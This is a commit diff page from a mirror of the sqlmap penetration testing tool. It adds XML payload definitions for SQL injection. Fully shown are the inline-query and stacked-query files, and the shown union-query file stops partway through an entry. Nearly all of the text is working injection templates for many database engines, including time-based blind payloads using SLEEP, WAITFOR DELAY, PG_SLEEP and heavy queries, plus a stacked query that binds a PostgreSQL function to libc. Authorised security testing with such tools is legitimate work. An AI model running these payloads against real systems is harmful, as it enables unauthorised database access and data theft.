PenTest/sqlmap
1
0
Fork 0
mirror of https://github.com/sqlmapproject/sqlmap.git synced 2025-12-10 09:49:06 +00:00
Code Issues Projects Releases Wiki Activity

Some refactoring (data)

Browse Source
This commit is contained in:
Miroslav Stampar
2019-05-24 12:01:39 +02:00
parent 82efb0ca79
commit ef7d4bb404
79 changed files with 50 additions and 30 deletions
Download Patch File Download Diff File Expand all files Collapse all files

1541
data/xml/payloads/boolean_blind.xml Normal file
View File

File diff suppressed because it is too large Load Diff

1234
data/xml/payloads/error_based.xml Normal file
View File

File diff suppressed because it is too large Load Diff

125
data/xml/payloads/inline_query.xml Normal file
View File

@@ -0,0 +1,125 @@
<?xml version="1.0" encoding="UTF-8"?>
<root>
<!-- Inline queries tests -->
<test>
<title>MySQL inline queries</title>
<stype>3</stype>
<level>1</level>
<risk>1</risk>
<clause>1,2,3,8</clause>
<where>3</where>
<vector>(SELECT CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]'))</vector>
<request>
<!-- These work as good as ELT(), but are longer
<payload>(SELECT CONCAT('[DELIMITER_START]',(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END)),'[DELIMITER_STOP]'))</payload>
<payload>(SELECT CONCAT('[DELIMITER_START]',(SELECT (MAKE_SET([RANDNUM]=[RANDNUM],1))),'[DELIMITER_STOP]'))</payload>
-->
<payload>(SELECT CONCAT('[DELIMITER_START]',(SELECT (ELT([RANDNUM]=[RANDNUM],1))),'[DELIMITER_STOP]'))</payload>
</request>
<response>
<grep>[DELIMITER_START](?P&lt;result&gt;.*?)[DELIMITER_STOP]</grep>
</response>
<details>
<dbms>MySQL</dbms>
</details>
</test>
<test>
<title>PostgreSQL inline queries</title>
<stype>3</stype>
<level>1</level>
<risk>1</risk>
<clause>1,2,3,8</clause>
<where>3</where>
<vector>(SELECT '[DELIMITER_START]'||([QUERY])::text||'[DELIMITER_STOP]')</vector>
<request>
<payload>(SELECT '[DELIMITER_START]'||(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END))::text||'[DELIMITER_STOP]')</payload>
</request>
<response>
<grep>[DELIMITER_START](?P&lt;result&gt;.*?)[DELIMITER_STOP]</grep>
</response>
<details>
<dbms>PostgreSQL</dbms>
</details>
</test>
<test>
<title>Microsoft SQL Server/Sybase inline queries</title>
<stype>3</stype>
<level>1</level>
<risk>1</risk>
<clause>1,2,3,8</clause>
<where>3</where>
<vector>(SELECT '[DELIMITER_START]'+([QUERY])+'[DELIMITER_STOP]')</vector>
<request>
<payload>(SELECT '[DELIMITER_START]'+(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN '1' ELSE '0' END))+'[DELIMITER_STOP]')</payload>
</request>
<response>
<grep>[DELIMITER_START](?P&lt;result&gt;.*?)[DELIMITER_STOP]</grep>
</response>
<details>
<dbms>Microsoft SQL Server</dbms>
<dbms>Sybase</dbms>
<os>Windows</os>
</details>
</test>
<test>
<title>Oracle inline queries</title>
<stype>3</stype>
<level>2</level>
<risk>1</risk>
<clause>1,2,3,8</clause>
<where>3</where>
<vector>(SELECT ('[DELIMITER_START]'||([QUERY])||'[DELIMITER_STOP]') FROM DUAL)</vector>
<request>
<payload>(SELECT '[DELIMITER_START]'||(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END) FROM DUAL)||'[DELIMITER_STOP]' FROM DUAL)</payload>
</request>
<response>
<grep>[DELIMITER_START](?P&lt;result&gt;.*?)[DELIMITER_STOP]</grep>
</response>
<details>
<dbms>Oracle</dbms>
</details>
</test>
<test>
<title>SQLite inline queries</title>
<stype>3</stype>
<level>3</level>
<risk>1</risk>
<clause>1,2,3,8</clause>
<where>3</where>
<vector>SELECT '[DELIMITER_START]'||([QUERY])||'[DELIMITER_STOP]'</vector>
<request>
<payload>SELECT '[DELIMITER_START]'||(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END))||'[DELIMITER_STOP]'</payload>
</request>
<response>
<grep>[DELIMITER_START](?P&lt;result&gt;.*?)[DELIMITER_STOP]</grep>
</response>
<details>
<dbms>SQLite</dbms>
</details>
</test>
<test>
<title>Firebird inline queries</title>
<stype>3</stype>
<level>3</level>
<risk>1</risk>
<clause>1,2,3,8</clause>
<where>3</where>
<vector>SELECT '[DELIMITER_START]'||([QUERY])||'[DELIMITER_STOP]' FROM RDB$DATABASE</vector>
<request>
<payload>SELECT '[DELIMITER_START]'||(CASE [RANDNUM] WHEN [RANDNUM] THEN 1 ELSE 0 END)||'[DELIMITER_STOP]' FROM RDB$DATABASE</payload>
</request>
<response>
<grep>[DELIMITER_START](?P&lt;result&gt;.*?)[DELIMITER_STOP]</grep>
</response>
<details>
<dbms>Firebird</dbms>
</details>
</test>
<!-- End of inline queries tests -->
</root>

691
data/xml/payloads/stacked_queries.xml Normal file
View File

@@ -0,0 +1,691 @@
<?xml version="1.0" encoding="UTF-8"?>
<root>
<!-- Stacked queries tests -->
<test>
<title>MySQL &gt; 5.0.11 stacked queries (comment)</title>
<stype>4</stype>
<level>2</level>
<risk>1</risk>
<clause>1-8</clause>
<where>1</where>
<vector>;SELECT IF(([INFERENCE]),SLEEP([SLEEPTIME]),[RANDNUM])</vector>
<request>
<payload>;SELECT SLEEP([SLEEPTIME])</payload>
<comment>#</comment>
</request>
<response>
<time>[SLEEPTIME]</time>
</response>
<details>
<dbms>MySQL</dbms>
<dbms_version>&gt; 5.0.11</dbms_version>
</details>
</test>
<test>
<title>MySQL &gt; 5.0.11 stacked queries</title>
<stype>4</stype>
<level>3</level>
<risk>1</risk>
<clause>1-8</clause>
<where>1</where>
<vector>;SELECT IF(([INFERENCE]),SLEEP([SLEEPTIME]),[RANDNUM])</vector>
<request>
<payload>;SELECT SLEEP([SLEEPTIME])</payload>
</request>
<response>
<time>[SLEEPTIME]</time>
</response>
<details>
<dbms>MySQL</dbms>
<dbms_version>&gt; 5.0.11</dbms_version>
</details>
</test>
<test>
<title>MySQL &gt; 5.0.11 stacked queries (query SLEEP - comment)</title>
<stype>4</stype>
<level>3</level>
<risk>1</risk>
<clause>1-8</clause>
<where>1</where>
<vector>;(SELECT * FROM (SELECT(SLEEP([SLEEPTIME]-(IF([INFERENCE],0,[SLEEPTIME])))))[RANDSTR])</vector>
<request>
<payload>;(SELECT * FROM (SELECT(SLEEP([SLEEPTIME])))[RANDSTR])</payload>
<comment>#</comment>
</request>
<response>
<time>[SLEEPTIME]</time>
</response>
<details>
<dbms>MySQL</dbms>
<dbms_version>&gt; 5.0.11</dbms_version>
</details>
</test>
<test>
<title>MySQL &gt; 5.0.11 stacked queries (query SLEEP)</title>
<stype>4</stype>
<level>4</level>
<risk>1</risk>
<clause>1-8</clause>
<where>1</where>
<vector>;(SELECT * FROM (SELECT(SLEEP([SLEEPTIME]-(IF([INFERENCE],0,[SLEEPTIME])))))[RANDSTR])</vector>
<request>
<payload>;(SELECT * FROM (SELECT(SLEEP([SLEEPTIME])))[RANDSTR])</payload>
</request>
<response>
<time>[SLEEPTIME]</time>
</response>
<details>
<dbms>MySQL</dbms>
<dbms_version>&gt; 5.0.11</dbms_version>
</details>
</test>
<test>
<title>MySQL &lt; 5.0.12 stacked queries (heavy query - comment)</title>
<stype>4</stype>
<level>3</level>
<risk>2</risk>
<clause>1-8</clause>
<where>1</where>
<vector>;SELECT IF(([INFERENCE]),BENCHMARK([SLEEPTIME]000000,MD5('[RANDSTR]')),[RANDNUM])</vector>
<request>
<payload>;SELECT BENCHMARK([SLEEPTIME]000000,MD5('[RANDSTR]'))</payload>
<comment>#</comment>
</request>
<response>
<time>[DELAYED]</time>
</response>
<details>
<dbms>MySQL</dbms>
</details>
</test>
<test>
<title>MySQL &lt; 5.0.12 stacked queries (heavy query)</title>
<stype>4</stype>
<level>5</level>
<risk>2</risk>
<clause>1-8</clause>
<where>1</where>
<vector>;SELECT IF(([INFERENCE]),BENCHMARK([SLEEPTIME]000000,MD5('[RANDSTR]')),[RANDNUM])</vector>
<request>
<payload>;SELECT BENCHMARK([SLEEPTIME]000000,MD5('[RANDSTR]'))</payload>
</request>
<response>
<time>[DELAYED]</time>
</response>
<details>
<dbms>MySQL</dbms>
</details>
</test>
<test>
<title>PostgreSQL &gt; 8.1 stacked queries (comment)</title>
<stype>4</stype>
<level>1</level>
<risk>1</risk>
<clause>1-8</clause>
<where>1</where>
<vector>;SELECT (CASE WHEN ([INFERENCE]) THEN (SELECT [RANDNUM] FROM PG_SLEEP([SLEEPTIME])) ELSE [RANDNUM] END)</vector>
<request>
<payload>;SELECT PG_SLEEP([SLEEPTIME])</payload>
<comment>--</comment>
</request>
<response>
<time>[SLEEPTIME]</time>
</response>
<details>
<dbms>PostgreSQL</dbms>
<dbms_version>&gt; 8.1</dbms_version>
</details>
</test>
<test>
<title>PostgreSQL &gt; 8.1 stacked queries</title>
<stype>4</stype>
<level>4</level>
<risk>1</risk>
<clause>1-8</clause>
<where>1</where>
<vector>;SELECT (CASE WHEN ([INFERENCE]) THEN (SELECT [RANDNUM] FROM PG_SLEEP([SLEEPTIME])) ELSE [RANDNUM] END)</vector>
<request>
<payload>;SELECT PG_SLEEP([SLEEPTIME])</payload>
</request>
<response>
<time>[SLEEPTIME]</time>
</response>
<details>
<dbms>PostgreSQL</dbms>
<dbms_version>&gt; 8.1</dbms_version>
</details>
</test>
<test>
<title>PostgreSQL stacked queries (heavy query - comment)</title>
<stype>4</stype>
<level>2</level>
<risk>2</risk>
<clause>1-8</clause>
<where>1</where>
<vector>;SELECT (CASE WHEN ([INFERENCE]) THEN (SELECT COUNT(*) FROM GENERATE_SERIES(1,[SLEEPTIME]000000)) ELSE [RANDNUM] END)</vector>
<request>
<payload>;SELECT COUNT(*) FROM GENERATE_SERIES(1,[SLEEPTIME]000000)</payload>
<comment>--</comment>
</request>
<response>
<time>[DELAYED]</time>
</response>
<details>
<dbms>PostgreSQL</dbms>
</details>
</test>
<test>
<title>PostgreSQL stacked queries (heavy query)</title>
<stype>4</stype>
<level>5</level>
<risk>2</risk>
<clause>1-8</clause>
<where>1</where>
<vector>;SELECT (CASE WHEN ([INFERENCE]) THEN (SELECT COUNT(*) FROM GENERATE_SERIES(1,[SLEEPTIME]000000)) ELSE [RANDNUM] END)</vector>
<request>
<payload>;SELECT COUNT(*) FROM GENERATE_SERIES(1,[SLEEPTIME]000000)</payload>
</request>
<response>
<time>[DELAYED]</time>
</response>
<details>
<dbms>PostgreSQL</dbms>
</details>
</test>
<test>
<title>PostgreSQL &lt; 8.2 stacked queries (Glibc - comment)</title>
<stype>4</stype>
<level>3</level>
<risk>1</risk>
<clause>1-8</clause>
<where>1</where>
<vector>;SELECT (CASE WHEN ([INFERENCE]) THEN (SELECT [RANDNUM] FROM SLEEP([SLEEPTIME])) ELSE [RANDNUM] END)</vector>
<request>
<payload>;CREATE OR REPLACE FUNCTION SLEEP(int) RETURNS int AS '/lib/libc.so.6','sleep' language 'C' STRICT; SELECT sleep([SLEEPTIME])</payload>
<comment>--</comment>
</request>
<response>
<time>[SLEEPTIME]</time>
</response>
<details>
<dbms>PostgreSQL</dbms>
<dbms_version>&lt; 8.2</dbms_version>
<os>Linux</os>
</details>
</test>
<test>
<title>PostgreSQL &lt; 8.2 stacked queries (Glibc)</title>
<stype>4</stype>
<level>5</level>
<risk>1</risk>
<clause>1-8</clause>
<where>1</where>
<vector>;SELECT (CASE WHEN ([INFERENCE]) THEN (SELECT [RANDNUM] FROM SLEEP([SLEEPTIME])) ELSE [RANDNUM] END)</vector>
<request>
<payload>;CREATE OR REPLACE FUNCTION SLEEP(int) RETURNS int AS '/lib/libc.so.6','sleep' language 'C' STRICT; SELECT sleep([SLEEPTIME])</payload>
</request>
<response>
<time>[SLEEPTIME]</time>
</response>
<details>
<dbms>PostgreSQL</dbms>
<dbms_version>&lt; 8.2</dbms_version>
<os>Linux</os>
</details>
</test>
<test>
<title>Microsoft SQL Server/Sybase stacked queries (comment)</title>
<stype>4</stype>
<level>1</level>
<risk>1</risk>
<clause>1-8</clause>
<where>1</where>
<vector>;IF([INFERENCE]) WAITFOR DELAY '0:0:[SLEEPTIME]'</vector>
<request>
<payload>;WAITFOR DELAY '0:0:[SLEEPTIME]'</payload>
<comment>--</comment>
</request>
<response>
<time>[SLEEPTIME]</time>
</response>
<details>
<dbms>Microsoft SQL Server</dbms>
<dbms>Sybase</dbms>
<os>Windows</os>
</details>
</test>
<test>
<title>Microsoft SQL Server/Sybase stacked queries</title>
<stype>4</stype>
<level>4</level>
<risk>1</risk>
<clause>1-8</clause>
<where>1</where>
<vector>;IF([INFERENCE]) WAITFOR DELAY '0:0:[SLEEPTIME]'</vector>
<request>
<payload>;WAITFOR DELAY '0:0:[SLEEPTIME]'</payload>
</request>
<response>
<time>[SLEEPTIME]</time>
</response>
<details>
<dbms>Microsoft SQL Server</dbms>
<dbms>Sybase</dbms>
<os>Windows</os>
</details>
</test>
<test>
<title>Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE - comment)</title>
<stype>4</stype>
<level>1</level>
<risk>1</risk>
<clause>1-8</clause>
<where>1</where>
<vector>;SELECT CASE WHEN ([INFERENCE]) THEN DBMS_PIPE.RECEIVE_MESSAGE('[RANDSTR]',[SLEEPTIME]) ELSE [RANDNUM] END FROM DUAL</vector>
<request>
<payload>;SELECT DBMS_PIPE.RECEIVE_MESSAGE('[RANDSTR]',[SLEEPTIME]) FROM DUAL</payload>
<comment>--</comment>
</request>
<response>
<time>[SLEEPTIME]</time>
</response>
<details>
<dbms>Oracle</dbms>
</details>
</test>
<test>
<title>Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE)</title>
<stype>4</stype>
<level>4</level>
<risk>1</risk>
<clause>1-8</clause>
<where>1</where>
<vector>;SELECT CASE WHEN ([INFERENCE]) THEN DBMS_PIPE.RECEIVE_MESSAGE('[RANDSTR]',[SLEEPTIME]) ELSE [RANDNUM] END FROM DUAL</vector>
<request>
<payload>;SELECT DBMS_PIPE.RECEIVE_MESSAGE('[RANDSTR]',[SLEEPTIME]) FROM DUAL</payload>
</request>
<response>
<time>[SLEEPTIME]</time>
</response>
<details>
<dbms>Oracle</dbms>
</details>
</test>
<test>
<title>Oracle stacked queries (heavy query - comment)</title>
<stype>4</stype>
<level>2</level>
<risk>2</risk>
<clause>1-8</clause>
<where>1</where>
<vector>;SELECT CASE WHEN ([INFERENCE]) THEN (SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5) ELSE [RANDNUM] END FROM DUAL</vector>
<request>
<payload>;SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5</payload>
<comment>--</comment>
</request>
<response>
<time>[DELAYED]</time>
</response>
<details>
<dbms>Oracle</dbms>
</details>
</test>
<test>
<title>Oracle stacked queries (heavy query)</title>
<stype>4</stype>
<level>5</level>
<risk>2</risk>
<clause>1-8</clause>
<where>1</where>
<vector>;SELECT CASE WHEN ([INFERENCE]) THEN (SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5) ELSE [RANDNUM] END FROM DUAL</vector>
<request>
<payload>;SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5</payload>
</request>
<response>
<time>[DELAYED]</time>
</response>
<details>
<dbms>Oracle</dbms>
</details>
</test>
<test>
<title>Oracle stacked queries (DBMS_LOCK.SLEEP - comment)</title>
<stype>4</stype>
<level>4</level>
<risk>1</risk>
<clause>1-8</clause>
<where>1</where>
<vector>;BEGIN IF ([INFERENCE]) THEN DBMS_LOCK.SLEEP([SLEEPTIME]); ELSE DBMS_LOCK.SLEEP(0); END IF; END</vector>
<request>
<payload>;BEGIN DBMS_LOCK.SLEEP([SLEEPTIME]); END</payload>
<comment>--</comment>
</request>
<response>
<time>[SLEEPTIME]</time>
</response>
<details>
<dbms>Oracle</dbms>
</details>
</test>
<test>
<title>Oracle stacked queries (DBMS_LOCK.SLEEP)</title>
<stype>4</stype>
<level>5</level>
<risk>1</risk>
<clause>1-8</clause>
<where>1</where>
<vector>;BEGIN IF ([INFERENCE]) THEN DBMS_LOCK.SLEEP([SLEEPTIME]); ELSE DBMS_LOCK.SLEEP(0); END IF; END</vector>
<request>
<payload>;BEGIN DBMS_LOCK.SLEEP([SLEEPTIME]); END</payload>
</request>
<response>
<time>[SLEEPTIME]</time>
</response>
<details>
<dbms>Oracle</dbms>
</details>
</test>
<test>
<title>Oracle stacked queries (USER_LOCK.SLEEP - comment)</title>
<stype>4</stype>
<level>5</level>
<risk>1</risk>
<clause>1-8</clause>
<where>1</where>
<vector>;BEGIN IF ([INFERENCE]) THEN USER_LOCK.SLEEP([SLEEPTIME]); ELSE USER_LOCK.SLEEP(0); END IF; END</vector>
<request>
<payload>;BEGIN USER_LOCK.SLEEP([SLEEPTIME]); END</payload>
<comment>--</comment>
</request>
<response>
<time>[SLEEPTIME]</time>
</response>
<details>
<dbms>Oracle</dbms>
</details>
</test>
<test>
<title>Oracle stacked queries (USER_LOCK.SLEEP)</title>
<stype>4</stype>
<level>5</level>
<risk>1</risk>
<clause>1-8</clause>
<where>1</where>
<vector>;BEGIN IF ([INFERENCE]) THEN USER_LOCK.SLEEP([SLEEPTIME]); ELSE USER_LOCK.SLEEP(0); END IF; END</vector>
<request>
<payload>;BEGIN USER_LOCK.SLEEP([SLEEPTIME]); END</payload>
</request>
<response>
<time>[SLEEPTIME]</time>
</response>
<details>
<dbms>Oracle</dbms>
</details>
</test>
<test>
<title>IBM DB2 stacked queries (heavy query - comment)</title>
<stype>5</stype>
<level>3</level>
<risk>2</risk>
<clause>1-8</clause>
<where>1</where>
<vector>;SELECT COUNT(*) FROM SYSIBM.SYSTABLES AS T1,SYSIBM.SYSTABLES AS T2,SYSIBM.SYSTABLES AS T3 WHERE ([INFERENCE])</vector>
<request>
<payload>;SELECT COUNT(*) FROM SYSIBM.SYSTABLES AS T1,SYSIBM.SYSTABLES AS T2,SYSIBM.SYSTABLES AS T3</payload>
<comment>--</comment>
</request>
<response>
<time>[DELAYED]</time>
</response>
<details>
<dbms>IBM DB2</dbms>
</details>
</test>
<test>
<title>IBM DB2 stacked queries (heavy query)</title>
<stype>5</stype>
<level>5</level>
<risk>2</risk>
<clause>1-8</clause>
<where>1</where>
<vector>;SELECT COUNT(*) FROM SYSIBM.SYSTABLES AS T1,SYSIBM.SYSTABLES AS T2,SYSIBM.SYSTABLES AS T3 WHERE ([INFERENCE])</vector>
<request>
<payload>;SELECT COUNT(*) FROM SYSIBM.SYSTABLES AS T1,SYSIBM.SYSTABLES AS T2,SYSIBM.SYSTABLES AS T3</payload>
</request>
<response>
<time>[DELAYED]</time>
</response>
<details>
<dbms>IBM DB2</dbms>
</details>
</test>
<test>
<title>SQLite &gt; 2.0 stacked queries (heavy query - comment)</title>
<stype>4</stype>
<level>3</level>
<risk>2</risk>
<clause>1-8</clause>
<where>1</where>
<vector>;SELECT (CASE WHEN ([INFERENCE]) THEN (LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB([SLEEPTIME]00000000/2))))) ELSE [RANDNUM] END)</vector>
<request>
<payload>;SELECT LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB([SLEEPTIME]00000000/2))))</payload>
<comment>--</comment>
</request>
<response>
<time>[DELAYED]</time>
</response>
<details>
<dbms>SQLite</dbms>
<dbms_version>&gt; 2.0</dbms_version>
</details>
</test>
<test>
<title>SQLite &gt; 2.0 stacked queries (heavy query)</title>
<stype>4</stype>
<level>5</level>
<risk>2</risk>
<clause>1-8</clause>
<where>1</where>
<vector>;SELECT (CASE WHEN ([INFERENCE]) THEN (LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB([SLEEPTIME]00000000/2))))) ELSE [RANDNUM] END)</vector>
<request>
<payload>;SELECT LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB([SLEEPTIME]00000000/2))))</payload>
</request>
<response>
<time>[DELAYED]</time>
</response>
<details>
<dbms>SQLite</dbms>
<dbms_version>&gt; 2.0</dbms_version>
</details>
</test>
<test>
<title>Firebird stacked queries (heavy query - comment)</title>
<stype>4</stype>
<level>4</level>
<risk>2</risk>
<clause>1-8</clause>
<where>1</where>
<vector>;SELECT IIF(([INFERENCE]),(SELECT COUNT(*) FROM RDB$FIELDS AS T1,RDB$TYPES AS T2,RDB$COLLATIONS AS T3,RDB$FUNCTIONS AS T4),[RANDNUM]) FROM RDB$DATABASE</vector>
<request>
<payload>;SELECT COUNT(*) FROM RDB$FIELDS AS T1,RDB$TYPES AS T2,RDB$COLLATIONS AS T3,RDB$FUNCTIONS AS T4</payload>
<comment>--</comment>
</request>
<response>
<time>[DELAYED]</time>
</response>
<details>
<dbms>Firebird</dbms>
<dbms_version>&gt;= 2.0</dbms_version>
</details>
</test>
<test>
<title>Firebird stacked queries (heavy query)</title>
<stype>4</stype>
<level>5</level>
<risk>2</risk>
<clause>1-8</clause>
<where>1</where>
<vector>;SELECT IIF(([INFERENCE]),(SELECT COUNT(*) FROM RDB$FIELDS AS T1,RDB$TYPES AS T2,RDB$COLLATIONS AS T3,RDB$FUNCTIONS AS T4),[RANDNUM]) FROM RDB$DATABASE</vector>
<request>
<payload>;SELECT COUNT(*) FROM RDB$FIELDS AS T1,RDB$TYPES AS T2,RDB$COLLATIONS AS T3,RDB$FUNCTIONS AS T4</payload>
</request>
<response>
<time>[DELAYED]</time>
</response>
<details>
<dbms>Firebird</dbms>
<dbms_version>&gt;= 2.0</dbms_version>
</details>
</test>
<test>
<title>SAP MaxDB stacked queries (heavy query - comment)</title>
<stype>5</stype>
<level>4</level>
<risk>2</risk>
<clause>1-8</clause>
<where>1</where>
<vector>;SELECT COUNT(*) FROM (SELECT * FROM DOMAIN.DOMAINS WHERE ([INFERENCE])) AS T1,(SELECT * FROM DOMAIN.COLUMNS WHERE ([INFERENCE])) AS T2,(SELECT * FROM DOMAIN.TABLES WHERE ([INFERENCE])) AS T3</vector>
<request>
<payload>;SELECT COUNT(*) FROM DOMAIN.DOMAINS AS T1,DOMAIN.COLUMNS AS T2,DOMAIN.TABLES AS T3</payload>
<comment>--</comment>
</request>
<response>
<time>[DELAYED]</time>
</response>
<details>
<dbms>SAP MaxDB</dbms>
</details>
</test>
<test>
<title>SAP MaxDB stacked queries (heavy query)</title>
<stype>5</stype>
<level>5</level>
<risk>2</risk>
<clause>1-8</clause>
<where>1</where>
<vector>;SELECT COUNT(*) FROM (SELECT * FROM DOMAIN.DOMAINS WHERE ([INFERENCE])) AS T1,(SELECT * FROM DOMAIN.COLUMNS WHERE ([INFERENCE])) AS T2,(SELECT * FROM DOMAIN.TABLES WHERE ([INFERENCE])) AS T3</vector>
<request>
<payload>;SELECT COUNT(*) FROM DOMAIN.DOMAINS AS T1,DOMAIN.COLUMNS AS T2,DOMAIN.TABLES AS T3</payload>
</request>
<response>
<time>[DELAYED]</time>
</response>
<details>
<dbms>SAP MaxDB</dbms>
</details>
</test>
<test>
<title>HSQLDB &gt;= 1.7.2 stacked queries (heavy query - comment)</title>
<stype>4</stype>
<level>4</level>
<risk>2</risk>
<clause>1-8</clause>
<where>1</where>
<vector>;CALL CASE WHEN ([INFERENCE]) THEN REGEXP_SUBSTRING(REPEAT(RIGHT(CHAR([RANDNUM]),0),[SLEEPTIME]00000000),NULL) END</vector>
<request>
<payload>;CALL REGEXP_SUBSTRING(REPEAT(RIGHT(CHAR([RANDNUM]),0),[SLEEPTIME]00000000),NULL)</payload>
<comment>--</comment>
</request>
<response>
<time>[SLEEPTIME]</time>
</response>
<details>
<dbms>HSQLDB</dbms>
<dbms_version>&gt;= 1.7.2</dbms_version>
</details>
</test>
<test>
<title>HSQLDB &gt;= 1.7.2 stacked queries (heavy query)</title>
<stype>4</stype>
<level>5</level>
<risk>2</risk>
<clause>1-8</clause>
<where>1</where>
<vector>;CALL CASE WHEN ([INFERENCE]) THEN REGEXP_SUBSTRING(REPEAT(RIGHT(CHAR([RANDNUM]),0),[SLEEPTIME]00000000),NULL) END</vector>
<request>
<payload>;CALL REGEXP_SUBSTRING(REPEAT(RIGHT(CHAR([RANDNUM]),0),[SLEEPTIME]00000000),NULL)</payload>
</request>
<response>
<time>[SLEEPTIME]</time>
</response>
<details>
<dbms>HSQLDB</dbms>
<dbms_version>&gt;= 1.7.2</dbms_version>
</details>
</test>
<test>
<title>HSQLDB &gt;= 2.0 stacked queries (heavy query - comment)</title>
<stype>4</stype>
<level>4</level>
<risk>2</risk>
<clause>1-8</clause>
<where>1</where>
<vector>;CALL CASE WHEN ([INFERENCE]) THEN REGEXP_SUBSTRING(REPEAT(LEFT(CRYPT_KEY('AES',NULL),0),[SLEEPTIME]00000000),NULL) END</vector>
<request>
<payload>;CALL REGEXP_SUBSTRING(REPEAT(LEFT(CRYPT_KEY('AES',NULL),0),[SLEEPTIME]00000000),NULL)</payload>
<comment>--</comment>
</request>
<response>
<time>[SLEEPTIME]</time>
</response>
<details>
<dbms>HSQLDB</dbms>
<dbms_version>&gt;= 2.0</dbms_version>
</details>
</test>
<test>
<title>HSQLDB &gt;= 2.0 stacked queries (heavy query)</title>
<stype>4</stype>
<level>5</level>
<risk>2</risk>
<clause>1-8</clause>
<where>1</where>
<vector>;CALL CASE WHEN ([INFERENCE]) THEN REGEXP_SUBSTRING(REPEAT(LEFT(CRYPT_KEY('AES',NULL),0),[SLEEPTIME]00000000),NULL) END</vector>
<request>
<payload>;CALL REGEXP_SUBSTRING(REPEAT(LEFT(CRYPT_KEY('AES',NULL),0),[SLEEPTIME]00000000),NULL)</payload>
</request>
<response>
<time>[SLEEPTIME]</time>
</response>
<details>
<dbms>HSQLDB</dbms>
<dbms_version>&gt;= 2.0</dbms_version>
</details>
</test>
<!-- TODO: if possible, add payload for Microsoft Access -->
<!-- End of stacked queries tests -->
</root>

2042
data/xml/payloads/time_blind.xml Normal file
View File

File diff suppressed because it is too large Load Diff

742
data/xml/payloads/union_query.xml Normal file
View File

@@ -0,0 +1,742 @@
<?xml version="1.0" encoding="UTF-8"?>
<root>
<!-- UNION query tests -->
<test>
<title>Generic UNION query ([CHAR]) - [COLSTART] to [COLSTOP] columns (custom)</title>
<stype>6</stype>
<level>1</level>
<risk>1</risk>
<clause>1,2,3,4,5</clause>
<where>1</where>
<vector>[UNION]</vector>
<request>
<payload/>
<comment>[GENERIC_SQL_COMMENT]</comment>
<char>[CHAR]</char>
<columns>[COLSTART]-[COLSTOP]</columns>
</request>
<response>
<union/>
</response>
</test>
<test>
<title>Generic UNION query (NULL) - [COLSTART] to [COLSTOP] columns (custom)</title>
<stype>6</stype>
<level>1</level>
<risk>1</risk>
<clause>1,2,3,4,5</clause>
<where>1</where>
<vector>[UNION]</vector>
<request>
<payload/>
<comment>[GENERIC_SQL_COMMENT]</comment>
<char>NULL</char>
<columns>[COLSTART]-[COLSTOP]</columns>
</request>
<response>
<union/>
</response>
</test>
<test>
<title>Generic UNION query ([RANDNUM]) - [COLSTART] to [COLSTOP] columns (custom)</title>
<stype>6</stype>
<level>3</level>
<risk>1</risk>
<clause>1,2,3,4,5</clause>
<where>1</where>
<vector>[UNION]</vector>
<request>
<payload/>
<comment>[GENERIC_SQL_COMMENT]</comment>
<char>[RANDNUM]</char>
<columns>[COLSTART]-[COLSTOP]</columns>
</request>
<response>
<union/>
</response>
</test>
<test>
<title>Generic UNION query ([CHAR]) - 1 to 10 columns</title>
<stype>6</stype>
<level>1</level>
<risk>1</risk>
<clause>1,2,3,4,5</clause>
<where>1</where>
<vector>[UNION]</vector>
<request>
<payload/>
<comment>[GENERIC_SQL_COMMENT]</comment>
<char>[CHAR]</char>
<columns>1-10</columns>
</request>
<response>
<union/>
</response>
</test>
<test>
<title>Generic UNION query (NULL) - 1 to 10 columns</title>
<stype>6</stype>
<level>1</level>
<risk>1</risk>
<clause>1,2,3,4,5</clause>
<where>1</where>
<vector>[UNION]</vector>
<request>
<payload/>
<comment>[GENERIC_SQL_COMMENT]</comment>
<char>NULL</char>
<columns>1-10</columns>
</request>
<response>
<union/>
</response>
</test>
<test>
<title>Generic UNION query ([RANDNUM]) - 1 to 10 columns</title>
<stype>6</stype>
<level>3</level>
<risk>1</risk>
<clause>1,2,3,4,5</clause>
<where>1</where>
<vector>[UNION]</vector>
<request>
<payload/>
<comment>[GENERIC_SQL_COMMENT]</comment>
<char>[RANDNUM]</char>
<columns>1-10</columns>
</request>
<response>
<union/>
</response>
</test>
<test>
<title>Generic UNION query ([CHAR]) - 11 to 20 columns</title>
<stype>6</stype>
<level>2</level>
<risk>1</risk>
<clause>1,2,3,4,5</clause>
<where>1</where>
<vector>[UNION]</vector>
<request>
<payload/>
<comment>[GENERIC_SQL_COMMENT]</comment>
<char>[CHAR]</char>
<columns>11-20</columns>
</request>
<response>
<union/>
</response>
</test>
<test>
<title>Generic UNION query (NULL) - 11 to 20 columns</title>
<stype>6</stype>
<level>2</level>
<risk>1</risk>
<clause>1,2,3,4,5</clause>
<where>1</where>
<vector>[UNION]</vector>
<request>
<payload/>
<comment>[GENERIC_SQL_COMMENT]</comment>
<char>NULL</char>
<columns>11-20</columns>
</request>
<response>
<union/>
</response>
</test>
<test>
<title>Generic UNION query ([RANDNUM]) - 11 to 20 columns</title>
<stype>6</stype>
<level>3</level>
<risk>1</risk>
<clause>1,2,3,4,5</clause>
<where>1</where>
<vector>[UNION]</vector>
<request>
<payload/>
<comment>[GENERIC_SQL_COMMENT]</comment>
<char>[RANDNUM]</char>
<columns>11-20</columns>
</request>
